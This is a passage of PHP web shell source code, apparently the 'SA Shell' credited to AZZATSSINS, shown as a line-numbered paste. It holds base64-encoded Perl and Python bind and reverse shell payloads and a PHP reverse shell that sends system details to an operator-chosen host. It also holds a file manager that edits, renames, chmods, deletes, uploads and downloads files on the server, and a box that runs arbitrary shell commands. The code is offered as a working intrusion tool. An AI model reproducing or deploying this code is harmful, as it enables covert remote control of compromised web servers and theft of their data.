  994. $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  995. $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
  996.  
  997. $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  998. $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i";
  999.  
  1000. ////////////////////////// php ///////////////////////
  1001. if ($op == 'php')
  1002. {
  1003.  
  1004. $sockfd=fsockopen($ip , $port , $errno, $errstr );
  1005.  
  1006.  if($errno != 0)
  1007.         {
  1008.             echo "$errno : $errstr";
  1009.         }
  1010.         else if (!$sockfd)
  1011.         {
  1012.                $result = "error connect!</p>";
  1013.         }
  1014.         else
  1015.         {
  1016.             fputs ($sockfd ,
  1017.             "
  1018. /################################\
  1019. #                                #
  1020. #           SA Shell             #
  1021. #                                #
  1022. #     Edited by AZZATSSINS       #
  1023. #                                #
  1024. \################################/");
  1025.          $pwd = shell_exec("pwd");
  1026.          $sysinfo = shell_exec("uname -a");
  1027.          $id = shell_exec("id");
  1028.          $len = 1337;
  1029.          fputs($sockfd ,$sysinfo . "\n" );
  1030.          fputs($sockfd ,$pwd . "\n" );
  1031.          fputs($sockfd ,$id ."\n\n" );
  1032.          while(!feof($sockfd))
  1033.          {
  1034.             $cmdPrompt ="(Saudi sh3ll)[$]> ";
  1035.             fputs ($sockfd , $cmdPrompt );
  1036.             $command= fgets($sockfd, $len);
  1037.             fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  1038.          }
  1039.          fclose($sockfd);
  1040.         }
  1041.  
  1042. echo "End Connect";
  1043. exit;
  1044. }
  1045.  
  1046.  
  1047.  
  1048.  
  1049. elseif ($op == 'perl')
  1050. {
  1051.  
  1052.  
  1053. op_sa("/tmp/sa.pl",$back_perl);
  1054.             $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
  1055.             sleep(1);
  1056.             echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
  1057.             unlink("/tmp/sa.pl");
  1058.  
  1059.  
  1060.  
  1061. }
  1062.  
  1063.  
  1064.  
  1065. elseif ($op == 'python')
  1066. {
  1067.  
  1068.  
  1069. op_sa("/tmp/sa.py",$back_py);
  1070.             $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
  1071.             sleep(1);
  1072.             echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
  1073.  
  1074.  
  1075.  
  1076.  
  1077. }
  1078.  
  1079. }
  1080. else if ($_POST['con'] == 'Connect bind'){
  1081. /////////////////////// bind /////////////////////
  1082.  
  1083. if ($op == 'perl')
  1084. {
  1085.  
  1086.  
  1087.  
  1088. $bind_port = $_POST['bind_port'];
  1089.  
  1090. op_sa("/tmp/sa.pl",$bind_perl);
  1091.             $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
  1092.             sleep(1);
  1093.             echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
  1094.             unlink("/tmp/sa.pl");
  1095.  
  1096.  
  1097.  
  1098. }
  1099.  
  1100. else if ($op == 'python')
  1101. {
  1102.  
  1103.  
  1104. $bind_port = $_POST['bind_port'];
  1105.  
  1106. op_sa("/tmp/sa.py",$bind_py);
  1107.             $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
  1108.             sleep(1);
  1109.             echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
  1110.             unlink("/tmp/sa.py");
  1111.  
  1112.  
  1113. }
  1114.  
  1115.  
  1116. }}
  1117.  
  1118.  
  1119. break;
  1120.  
  1121. }
  1122.  
  1123. }
  1124. else
  1125. {
  1126. /////////// File Manager //////////////
  1127.  
  1128. $sws = 'azzatssins' ;
  1129. if ($sws != 'azzatssins'){echo "Coded by azzatssins"; exit;}
  1130.  
  1131. if(@$_GET['dir']){
  1132.     $dir = $_GET['dir'];
  1133.     if($dir != 'nullz') $dir = @cleandir($dir);
  1134. }
  1135.  
  1136. $curdir = @cleandir(@getcwd());
  1137. $self = $_SERVER['PHP_SELF'];
  1138. $me = $_SERVER['PHP_SELF'];
  1139.  
  1140. if($dir=="") $dir = $curdir;
  1141.     $dirx = explode(DIRECTORY_SEPARATOR, $dir);
  1142.     $files = array();
  1143.     $folders = array();
  1144.     echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
  1145.     echo"<tr><td style=\"text-align: left\" >";
  1146.     echo" Your path : &nbsp;";
  1147.     for($i=0;$i<count($dirx);$i++){
  1148.         @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
  1149.         echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
  1150.     }
  1151.     echo "<td></tr></table></div><br />";
  1152.     echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
  1153.     echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
  1154.     if ($handle = @opendir($dir)) {
  1155.         while (false != ($link = readdir($handle))) {
  1156.                $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
  1157.                $gr = @posix_getgrgid(@filegroup($dir."/".$link));
  1158.             if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
  1159.                 $file = array();
  1160.                 @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
  1161.                 $file['pir'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
  1162.                 $file['pir2'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
  1163.  
  1164.                 $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?azzatssins=rname&file=$link&dir=$dir'\">R</a> - <a href='?azzatssins=chmod&file=$link&dir=$dir'\">C</a> - <a href='?azzatssins=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
  1165.  
  1166.                 array_push($folders, $folder);
  1167.             }
  1168.             else{
  1169.                 $file = array();
  1170.                 $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
  1171.                  $file['pir'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
  1172.                  $file['pir2'] = "<a href='?azzatssins=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
  1173.                  $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
  1174.                    @$file['link'] = "<a href='?azzatssins=edit&file=$link&dir=$dir'\">".$link ."</a>";
  1175.                  $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?azzatssins=edit&file=$link&dir=$dir'\">E</a> - <a href='?azzatssins=rname&file=$link&dir=$dir'\">R</a> - <a href='?azzatssins=chmod&file=$link&dir=$dir'\">C</a> - <a href='?azzatssins=dow&file=$link&dir=$dir'\">D</a> - <a href='?azzatssins=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
  1176.                 array_push($files, $file);
  1177.             }
  1178.  
  1179.         }
  1180.          asort($folders);
  1181.          asort($files);
  1182.  
  1183.         foreach($folders as $folder) echo $folder;
  1184.        foreach($files as $file) echo $file;
  1185.         echo "</table></div>" ;
  1186.         closedir($handle);
  1187.  
  1188.  
  1189. }
  1190.  
  1191.  
  1192.  
  1193.  
  1194.  
  1195.  
  1196.  
  1197.  
  1198.  
  1199.  
  1200.  
  1201.  
  1202.  
  1203.  
  1204. }
  1205.  
  1206.  
  1207. if ($_GET['azzatssins'] == 'rname')
  1208. {
  1209.  
  1210. $dir = $_GET['dir'];
  1211.  
  1212. $file = $_GET['file'];
  1213.  
  1214. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  1215.  
  1216. if (!isset($_POST['edit']))
  1217. {
  1218.  
  1219. echo "<br />
  1220. <div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
  1221. <a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div><br />
  1222. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  1223. <form method='post'>
  1224. new name : <input type='text' value='$file' name='name'  /><br /><br />
  1225. <input type='submit' value='edit' name='edit' />
  1226.  
  1227. </form>
  1228.  
  1229. ";
  1230. }else
  1231. {
  1232.  
  1233. $new = $_POST['name'];
  1234.  
  1235. $rn = @rename ($dir."/".$file,$dir."/".$new);
  1236.  
  1237. if(!$rn)
  1238. {
  1239.  
  1240.  
  1241. @cmd("cd $dir;mv $file $new ");
  1242.  
  1243.  
  1244. }else
  1245. {
  1246.  
  1247. echo "<br /><br />Name change successfully";
  1248.  
  1249. echo "<br /><br /><a href='?azzatssins=rname&file=$new&dir=$dir'\">[ Back ]</a>";
  1250.  
  1251. }
  1252.  
  1253.  
  1254.  
  1255. }
  1256. }
  1257.  
  1258.  
  1259.  
  1260.  
  1261.  
  1262. if ($_GET['azzatssins'] == 'chmod')
  1263. {
  1264.  
  1265. $dir = $_GET['dir'];
  1266.  
  1267. $file = $_GET['file'];
  1268.  
  1269. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  1270.  
  1271. if (!isset($_POST['edit']))
  1272. {
  1273.  
  1274. echo "<br />
  1275. <div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
  1276. <a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div><br />
  1277. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  1278. <form method='post'>
  1279. File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
  1280. <option value=\"755\">755</option>
  1281. <option value=\"777\">777</option>
  1282. <option value=\"644\">644</option>
  1283. </select>
  1284. <br /><br /><input type='submit' value='chmod' name='edit' />
  1285.  
  1286. </form>
  1287.  
  1288. ";
  1289. }
  1290. else
  1291. {
  1292.  
  1293. $pir = $_POST['ch'];
  1294.  
  1295. if ($pir == '755'
  1296. )
  1297.  
  1298. {
  1299.    $cd = @chmod($_POST['file'],0775);
  1300. }
  1301. elseif ($pir == '777')
  1302.        {
  1303.    $cd = @chmod($_POST['file'],0777);
  1304.  
  1305.        }
  1306. elseif ($pir == '644')
  1307. {
  1308.  
  1309. $cd = $cd = @chmod($_POST['file'],0644);
  1310.  
  1311. }
  1312.  
  1313. if(!$cd)
  1314. {
  1315. echo "ERROR";
  1316.  
  1317. }else
  1318. {
  1319.  
  1320. echo "changed Successfully";
  1321. echo "<br /><br /><a href='?azzatssins=chmod&file=$file&dir=$dir'\">[ Back ]</a>";
  1322.  
  1323.  
  1324. }
  1325.  
  1326. }
  1327. }
  1328.  
  1329. if ($_GET['azzatssins'] == 'edit')
  1330. {
  1331.  
  1332. $file = $_GET['file'];
  1333. $dir = $_GET['dir'];
  1334.  
  1335. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  1336.  
  1337. if (!isset($_POST['ed']))
  1338. {
  1339.  
  1340. $fil33 = @fopen($dir."/".$file, 'r');
  1341. $content = @fread($fil33, @filesize($dir."/".$file));
  1342.  
  1343. echo "
  1344. <div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
  1345. <a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div>
  1346. <br />
  1347. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  1348. <form method=\"post\">
  1349. <br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
  1350. echo htmlentities($content) . "\n";
  1351. echo '
  1352. </textarea>
  1353. <br /><br />
  1354. <input type="submit" name="ed" value="Save !"/>
  1355. </form>
  1356.  
  1357. ';
  1358.  
  1359. }
  1360. else
  1361. {
  1362.  
  1363.  
  1364. $oo = @fopen($dir."/".$file, 'w');
  1365.       $ow =   @fwrite($oo, @stripslashes($_POST['fil3']));
  1366.         @fclose($oo);
  1367.         if (!$ow){echo "Error";}else {
  1368.           echo header("Location: ?azzatssins=edit&file=$file&dir=$dir");
  1369.           }
  1370.  
  1371.  
  1372.  
  1373.  
  1374.  
  1375. }
  1376.  
  1377.  
  1378.  
  1379.  
  1380. }
  1381. else if ($_GET['azzatssins'] == 'dow')
  1382. {
  1383. $file = $_GET['file'];
  1384. $dir = $_GET['dir'];
  1385.  
  1386. @sa_download ($dir."/".$file);
  1387.  
  1388.  
  1389. }
  1390. /////////////////////////////////////////////////////
  1391. if ($_GET['azzatssins'] == 'rm')
  1392. {
  1393.  
  1394. $dir = $_GET['dir'];
  1395.  
  1396. $file = $_GET['file'];
  1397.  
  1398. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  1399.  
  1400. if (!isset($_POST['edit']))
  1401. {
  1402.  
  1403. echo "<br />
  1404. <div class=\"cont3\">  <a href='?azzatssins=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?azzatssins=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?azzatssins=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?azzatssins=dow&file=$file&dir=$dir'\">Download</a>
  1405. <a href='?azzatssins=rm&file=$file&dir=$dir'\">Delete</a></div>
  1406. <br />
  1407. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  1408. <form method='post'>
  1409. <input type='submit' value='Delete' name='edit' />
  1410.  
  1411. </form>
  1412.  
  1413. ";
  1414. }else
  1415. {
  1416.  
  1417.  
  1418. $rn = @unlink ($dir."/".$file);
  1419.  
  1420. if(!$rn)
  1421. {
  1422.  
  1423.  
  1424. $rn = @rmdir ($dir."/".$file);
  1425.  
  1426.  
  1427.  
  1428. }elseif (!$rn)
  1429. {
  1430.  $rn =  @cmd("cd $dir;rm $file");
  1431.  
  1432. }
  1433. else if (!$rn){@cmd ("cd $dir;rm -r $file");}
  1434. else{
  1435.  
  1436. echo header("Location: $pg?dir=$dir");
  1437. }
  1438.  
  1439. echo header("Location: $pg?dir=$dir");
  1440.  
  1441. }
  1442. }
  1443. ///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////
  1444.  
  1445. else if ($_GET['azzatssins'] == 'mkdir')
  1446. {
  1447.  
  1448.  
  1449. $dir = $_POST['dir'];
  1450. $file = $_POST['n4me'];
  1451.  
  1452. $mkdir = @mkdir ($dir."/".$file,0755);
  1453.  
  1454. if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
  1455. header("Location: $pg?dir=$dir");
  1456.  
  1457. }
  1458.  
  1459.  
  1460. else if ($_GET['azzatssins'] == 'mkfile')
  1461. {
  1462.  
  1463. $dir = $_POST['dir'];
  1464. $file = $_POST['n4me'];
  1465.  
  1466.  
  1467. $mkdir = @fopen($dir."/".$file,'w');
  1468.  
  1469. if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
  1470.  
  1471.  
  1472. }
  1473.  
  1474. else if ($_GET['azzatssins'] == 'up')
  1475. {
  1476.  
  1477.  
  1478. $dir = $_POST['dir'];
  1479.  
  1480.  
  1481. if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
  1482.     else { echo '<br /><br />Not uploaded !!<br><br>';exit; }
  1483.  
  1484. }
  1485.  
  1486.  
  1487. //////////////////////////// read file /////////////////////
  1488.  
  1489. else if ($_GET['azzatssins'] == 'rfile')
  1490. {
  1491.  
  1492.  
  1493.  
  1494. $file = $_POST['n4me'];
  1495.  
  1496. echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />  ";
  1497.  
  1498. if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}
  1499.  
  1500. echo "<div>";
  1501.  
  1502. $r3ad = @fopen($file, 'r');
  1503. if ($r3ad){
  1504. $content = @fread($r3ad, @filesize($file));
  1505. echo "<pre>".htmlentities($content)."</pre>";
  1506. }
  1507. else if (!$r3ad)
  1508. {
  1509. echo "<pre>";
  1510. $r3ad = @show_source($file) ;
  1511. echo "</pre>";
  1512. }
  1513. else if (!$r3ad)
  1514. {
  1515. echo "<pre>";
  1516. $r3ad = @highlight_file($file);
  1517. echo "</pre>";
  1518. }
  1519. else if (!$r3ad)
  1520. {
  1521. echo "<pre>";
  1522. $sm = @symlink($file,'sym.txt');
  1523.  
  1524.  
  1525. if ($sm){
  1526. $r3ad = @fopen('sym.txt', 'r');
  1527. $content = @fread($r3ad, @filesize($dir."/".$file));
  1528. echo "<pre>".htmlentities($content)."</pre>";
  1529. }
  1530. }
  1531.  
  1532. echo "</div>";
  1533.  
  1534. //////////////////////// cmd /////////////////////////////////
  1535.  
  1536.  
  1537. }else if ($_GET['azzatssins'] == 'cmd')
  1538. {
  1539. $cmd = $_POST['n4me'];
  1540. $dir = $_POST['dir'];
  1541.  
  1542. if (isset($cmd))
  1543. {
  1544.  
  1545.  
  1546. echo "<br /><textarea cols='65' rows='25' name='fil3'> ";
  1547.  
  1548. echo @cmd("cd $dir;$cmd") ;
  1549.  
  1550. echo " </textarea>";
  1551.  
  1552.  
  1553.  
  1554. }
  1555.  
  1556.  
  1557.  
  1558.  
  1559. }
  1560. else if ($_GET['azzatssins'] == 'site')
  1561. {
  1562.  
  1563.  
  1564.  
  1565.  
  1566. $read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;
  1567.  
  1568. $sit3 = @findit($read,"<pre>","</pre>");
  1569.  
  1570. echo "<br /><div class='site'><pre> ";
  1571.  
  1572.  
  1573. echo $sit3;
  1574.  
  1575. echo "</pre> </div>";
  1576.  
  1577. exit;
  1578.  
  1579.  
  1580. }
  1581.  
  1582.  
  1583.  
  1584.  
  1585.  
  1586.  
  1587.  
  1588.  
  1589.  
  1590.  
  1591. if(@$_GET['dir']){
  1592.     $dir = $_GET['dir'];
  1593.     if($dir != 'nullz') $dir = cleandir($dir);
  1594. }
  1595.  
  1596. echo "
  1597.  
  1598. <br /><br />
  1599. </div><div class='d0n'>
